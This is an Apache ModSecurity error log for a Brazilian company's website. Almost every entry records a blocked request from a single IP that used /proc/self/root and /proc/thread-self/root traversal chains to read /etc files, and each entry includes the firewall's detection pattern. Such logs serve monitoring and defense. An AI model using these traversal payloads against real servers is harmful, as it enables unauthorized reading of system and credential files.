[Fri Mar 20 06:29:07.379466 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:39706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TY-oXxyEfFpUF8f9v-gAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:08.792718 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:58220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TZBCii7xarUs8iHZWLAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:10.066116 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:58232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TZta6ubjKNq_cu4bAkAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:11.251053 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.241.31:58248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TZxCii7xarUs8iHZWLQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:13.883263 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:58264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TaPqxLDW4GITHUkTS9gAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:15.419932 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:58272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ta_XLqtnMIWvjpaKH9AAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:16.763467 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:58276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TbDJ3M9BSuKP7CAYFQQAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:18.029628 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:51966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TbvXLqtnMIWvjpaKH9QAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:19.396985 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:51978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Tb_qxLDW4GITHUkTS_QAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:20.567191 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:51988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TcDJ3M9BSuKP7CAYFQwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:22.086862 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:52004] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Tcda6ubjKNq_cu4bAmgAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:23.436813 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.241.31:52016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TczJ3M9BSuKP7CAYFSAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:25.202192 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:52024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TdAF0L0L-SsrnPo5VmgAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:26.538497 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.241.31:52034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TdvHIg5MgXLBnicPnXwAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:27.656286 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:59006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Td-oXxyEfFpUF8f9wBwAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:28.900809 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:59010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TePXLqtnMIWvjpaKH-gAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:30.170837 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:59026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TeuoXxyEfFpUF8f9wCAAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:31.427519 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.241.31:59036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Te_XLqtnMIWvjpaKH_QAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:32.591832 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.241.31:59046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TfPXLqtnMIWvjpaKIAAAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:34.926415 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:59060] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TfeoXxyEfFpUF8f9wDAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:29:37.374961 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:59070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TgPqxLDW4GITHUkTTCgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
